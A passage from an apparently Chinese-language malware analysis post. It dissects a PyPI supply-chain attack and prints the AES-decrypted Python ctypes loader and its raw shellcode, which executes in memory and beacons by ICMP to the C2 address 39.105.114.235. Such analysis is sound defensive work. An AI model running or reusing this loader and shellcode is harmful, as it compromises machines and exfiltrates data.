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')%4))).rstrip(b'\0')))

0x06 发现ctypes模块与shellcode AES解密

通过第5小节的操作方法打印出来的代码,去掉\x00\x00前面的不可见字符,\n换行符进行手动处理,就能得到加载shellcode的loader代码(把执行相关命令的代码写入到内存中的控制代码),处理后代码如下,而shellcode就是bytearray(b),也就是字符串b中AES解密的结果。ctypes模块加载shellcode的用法网上有大量例子,这里可以参考文章CS免杀-Shellcode Loader原理(python)-XG小刚

b=AES.new(b'ysIx0oKueJV15dkA4P3WvDjnq9giB62=',AES.MODE_CBC,b'jbMNXRf954m0WUzQ').decrypt(base64.decodebytes(b'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'+b'='*(len(b'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')%4))).rstrip(b'\\0')
shellcode=bytearray(b)
ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
ptr=ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf=(ctypes.c_char*len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
handle=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

这里再直接利用攻击者的代码对shellcode进行AES解密,代码其实就是上面第一行。最终我们处理得到攻击者最原始的攻击代码,代码如下。

# -*- coding:utf-8 -*-

import ctypes

shellcode=bytearray(b'H\x8b\xc4H\x89X\x08H\x89h\x10H\x89p\x18H\x89x AVH\x83\xec eH\x8b\x04%`\x00\x00\x003\xdbH\x8bH\x18H\x8bQ \xebN\x0f\xb7BHL\x8bBP\x8b\xcb\xd1\xe8\x85\xc0~+D\x8b\xc8A\x0f\xb7\x00M\[email protected]\x02f\x83\xf8ar\nA\xba\xe0\xff\x00\x00fA\x03\xc2i\xc9\x83\x00\x00\x00\x0f\xb7\xc0\x03\xc8I\xff\xc9u\xd8\x0f\xba\xf1\x1f\x81\xf9\xe6\x9c\xca\x1c\x0f\x84\x97\x00\x00\x00H\x8b\x12H\x85\xd2u\xadH\x8b\xfbE3\xc0\xbaT\xb8\xb9\x1aH\x8b\xcf\xe8\x88\x00\x00\x00\xbab4\x89^H\x8b\xcfL\x8b\xc0\xe8x\x00\x00\x00H\x8d\x15E\x01\x00\x003\xc9\x8b*H\x8dz\x08L\x8dr\x04\x8bt*\x04D\[email protected]\xb8\x00\x10\x00\x00\x8b\xd6H\x03\xfd\xff\xd0L\x8b\xc8\x85\xf6t L\x8b\xc0H+\xf83\xd2\x8b\xc3\xff\xc3\xf7\xf5B\x8a\x042B2\x04\x07A\x88\x00I\xff\xc0;\xder\xe6H\x8b\\$0H\x8bl$8H\[email protected]\x8b|$HH\x83\xc4 A^I\xff\xe1H\x8bz \xe9k\xff\xff\xff\xcc\xcc\xccH\x8b\xc4H\x89X\x08H\x89h\x10H\x89p\x18H\x89x AVH\x83\xec HcA<L\x8b\xc9I\x8b\xd8\x8b\x8c\x08\x88\x00\x00\x00\x8b\xea\x85\xc9tjB\x83\xbc\x08\x8c\x00\x00\x00\x00t_I\x8d\x04\tD\x8bX\x18E\x85\xdbtRD\[email protected] \x8bx\x1c\x8bp$M\x03\xc1I\x03\xf9I\x03\xf13\xd2E\x85\xdbt8E\x8b\x10M\x03\xd13\xc9A\x8a\x02M\x8b\xf2\xeb\x11i\xc9\x83\x00\x00\x00\x0f\xbe\xc0\x03\xc8I\xff\xc6A\x8a\x06\x84\xc0u\xeb\x0f\xba\xf1\x1f;\xcdt(\xff\xc2I\x83\xc0\x04A;\xd3r\xc83\xc0H\x8b\\$0H\x8bl$8H\[email protected]\x8b|$HH\x83\xc4 A^\xc3H\x85\xdbu\x0c\x0f\xb7\x0cV\x8b\x04\x8fI\x03\xc1\xeb\xd4I\x8b\xd2I\x8b\xc9\xff\xd3\xeb\xca\xcc\xcc\n\x00\x00\x00\xdf\x8c\x19\xb8P\'[\xdb\x1bw}\x04\x00\x007\x88\x19\xb8P\x002\xa9\xf0.\x97\x0f\xf5\x90\xb8"[\xdb\x1b?\\H1{\xb9GZ\xdb\x1b2\xeeL(x\xbb\x0b=\xd4\x04\xf3\xdf\x8c\x19\xb8PaTl\x176\x9a\x01HX\x11\xa4\xa2\xbb}2\xd0\xca\xc8\xfc9\xef\xd8\xdb\x1bw\x9e\x83\xaez\x14&\x93\x92\xe4\xb7\x9e\xb5\xc9\xc4\x88\x02\xa4$\xe4\x08\x1c\xea\x89\x89\x90\xccB\xbd}\x11\xf1\x83\x06<P\'[\xdb\x1b\x1e\x1f\x0f\x19\xb8Po\xa4\x1a\x1a\xb5V\\\x16\x06A\xa2\x89\xae\xf7R s\xe6\xc7\x93AT\xc4_w\xdf\xcdN\xf9\x06f\x0e\x9aO!\x88\xd9J\xf0\xd3\xcbc\x96\x92\xb0\x9e\x05\xcc\xf0\xd9\xe9\x13\xb8UKT\x08\x170P\'[\x9e*\x81\x97\t\xd9\xb7\xd4\x8b[\xdb\x1b2\xeez\x9a\x04^\xab[\xdb\x1bw\xd0\x08\x82\xb8P\'\xd0\xa7\x1do\x9a\xbd\xef\xf0\xd5\xd8T_\x90w\xdf\x8c\x92\xf4V;\xd0\xb7\x1dW\x97\x8d\xe8\xf0\xd9k\x7f\xeb\x903\xd9\xa8Q1\x14\x03s\x93\x1a\x82\x9a\xbd\xef\x89\x99A=\xbd}\x11\xf1\x83\x06<P\'[\xdb\x1b>[email protected]\x81\xacT\x0f\x99\x90+z\x8cQ\xb9\xa3o\xd2\x02\xf3O s\xe6\xf1\xddk\x7f\xda_N7\xf9\xc7\xf4\xd9\xdf\x13^\xdb\x03\xc6\xc4\x90I\x18\xae\x81\x93\x98\xb3\xe7\xd7D\xe7\x0ef\x07\x9aF6\x81\xcdF\xf0\xaf\xc7\x13P_S\xf7\xc4\x18H\x12(\xec\xdf{?T\xc0=\x88\x14\xacoZRv)\xc0\x90H\x18\xa4\x9f\[email protected]*\x80\xd2X\xe4\x11z\x1a\x85Z(\x1c\xcdN\xf9\x06f\x0e\x9aO!\x88\xd9J\xf0\xd1\xcb\xe3\xd3\x1bw\x96\x05\xd7\xdd\x18\xac_\xfe{w\xdf\x8cQ3 ?\x13X\xddW\x9a\xbd\xfd\xde_8\x1f\xdb\x1b?T\xbaQ=\xa6SA\xd4\xac!\x97]\xf3\xf0\xdbi\x0b3B\x89 s$^\xcc\xedG\xae\xf9;T\xea9\x02\x04\x9f\xe2\xc1^F\x1f\xc0\x90Y\xb8\x89\xa5$\xe4?VO\xa3\xc0O\x07$\x97\x92\x96\x96\x05\xc1P\xcb\xd9\xa4$R\xfe\x181\x18\xb8P\'\x13V.\x8b\xde\x8c\x19SLAu\xd4\x04\xf3\xdf\x8c\x19\xb8P\xacO\xecR\xfe\x07dlF\xaf\xd8\x13R\[email protected]\\I\x1b5\x15\xd8\x13P\'\xb1\x97\t\xe6\xccq\xae\xb3\x93\x90s\x195\xf6\x06\xbd\xf9\x13\xe2\xd3;Vmmw\x18&\xab\x93\x92\xb6\x9es\xce\xf0\xd9\xe6\xb0\x1aS\xb0\xda*\x18\xb8P\'[\xdb\x1b6T\x92\\\x89\xa6\x16\x92a\x1bw\xcf\x8cX\x00P7[\xdbZ\xce\x9f\x8c\x19\xb8\xaf2\x0c\xda\x1bw\x97\x05\xdcGEqZ\xdb\x1b?VJU5\xfc\x03\x0b\xdf\x1bw\x97\x01e\x9c\x00o\xd2\xb7??\x96\x05\xf6SD\x9ek\xae\x1bw \x99P\xb9P\'\x17PgS\x97\xc9(N\xc0\xe0\x1f\xffK\x89\x15r\xd3\xfc\xd9S\x7f\x8f\xdd3\xfb\xd4\x18\xf9\xaf\xe1j6\xf0~\xd0\x93\x99\xb8P\'[$\xde\xf4"\x89f}6(D_\x1bw\xdf\x8c\x19\xf4\xd9K\x7f\xf3\xdc3\xfb\xb4\x91\xabP\'\x9c\x9f?G\xbd\x88\x19\xb8\x18\xe0\x1f\xff;w\xdf\x8c\x19\xf9\xe9\'_\xdb\x1b?V}\x90b\x19\xae\xa3$\x0e\xb9\xdf\x8c\x19;\xa8&.b\x98\xcb\xfb\xd8\x1d\xb8P\'.dS\xfcK\xa8y\xbcP\'\x1bQ1? N\x16\x0f\xd4\x03\x07\xdf\x1bwfc\xa7U\x8ec\xd6\x7f\x13g\x9e\x9e8\xf4\xd9\xde\x16R\xfb\x88\xca\x14\x19\xb8PjZ<[\xf7"\x8d\x16=\x03\xd8\xa4$S\xfe.s\x0c*P\'[\x1c_S\x9cR\xe6t\xdf\xe1\x1f\xff\\\xed\x97\x07E\x9c\x18nr\x04*\xbe\x971\xd4t\x9c\xeb\x97\x17\xd7\xbb4\xaa\x16\xa7\xd0\'[\xdb\x1b?VDQO\xb5o\x9a1\x19?R\x88\x8b\xf0\xd9\xed\x13\xf2\xd9xi\xc8\r\xfb`#P\x93\xe4\xb6\x93\xb5\xe0\xc4\x8c\xd8\x88KS\xf6\x1b4\x11\xb8P|\x06\x84E6\x83\xcdD\xf9\x0ef\x04\x18\x14h\x9b\x8c\x19\xdad\xae\x05\xdb\x1bw\xdf\xa9\x93\x01$\'[\xdb\x1b]\xc1\xd74\xb8P\'[\xf4$\x85\xcd\x8c\x19\xb8Pt\xdb^$w\xdf\x8c\x19\x8bN\xc12\xdb\x1bw\xdf\\\xe6G\xaf\xd8\xa4$\xe4\x98aa\xc7\xb8P\'[\x03\xe4\x88 s\xe6G\xafO[\xdb\x1bw\xdf\x8c\x19X\xaf\xd8\xa4$\xe4\x88 \xe4\x19\xb8P\'[\xdb\x1b\x9f s\xe6G\xaf\xd8\xa4\xae\x1bw\xdf\x8c\x19\xb8P\xd7\xa4$\xe4\x88 s\xe6W\xee\xca\x85\xdb\x1bw\xdft\xe6G\xaf\xd8\xa4$\xe4\x1f\xdf\x8c\x19\xb8P\'[\xdb\x1bw\xdf\x8c\x19\xb8Pn\x0b\x93W\'\x9e\xdcP\x96\x14k\x17\xdbv\x04\xa9\xefk\xcc~C7\xb7\x1b\x00')
ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
ptr=ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf=(ctypes.c_char*len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
handle=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

0x07 恶意代码流量分析

笔者一开始将第6节最后得到的代码保存为.py文件上传到国内的云沙箱平台,但是发现云沙箱没有发现网络连接情况。只好自己搭了台vmwaer靶机,在其中安装python对恶意代码进行运行,并在宿主机上使用wireshark对靶机进行抓包,抓到了shellcode执行时的网络连接情况,该行为为使用ping命令对C2服务器进行数据传输,C2服务器ip地址为39.105.114.235。由于笔者测试时,攻击者应该是看到微步的风声已经关闭了C2服务端,shellcode执行后并没有与C2建立起完整连接。
为什么说有数据传输呢?因为ping命令默认的data数据为有规律的,在windwos环境下,ping的data部分为:abcdefghijklmnopqrstuvwabcdefghi,而shellcode执行的ping命令中的data是没有这种规律的,所以怀疑有数据隐藏在icmp协议data中发送给C2,但是实际C2服务端已经关闭,所以服务器按照正常的imcp ping的响应流程,把data数据原样返回给靶机。
恶意代码流量分析.png
使用微步查询IP情报,也发现39.105.114.235这个C2地址被其他蓝队溯源分析到了,说明我们发现的C2地址是准确的。微步上的C2地址关联到了一个恶意文件,shell.exe文件大概是蓝队使用打包工具把py恶意代码重新打包上传到微步的,链接如下 https://s.threatbook.com/report/file/ba8ef66afb5cdc26a2f521b1e3bba6715fbf3a5be6f676e14dbe87b07e847be6

0x08 总结

经过上述剥笋式分析,可以发现攻击者首先使用CS工具生成shellcode,然后对shellcode进行AES加密和base64编码,再对整体代码进行AES加密和base64编码,再把得到的字符串进行拆分和重组得到新的字符串,再添加上图片头格式伪造成一般图片,上传到公有图床上,然后再编写恶意代码其他的功能模块,把恶意代码库上传到PyPI上,再在github上写一段像模像样的代码引入恶意代码库同时保证其执行。

Last modification:July 26th, 2022 at 06:18 am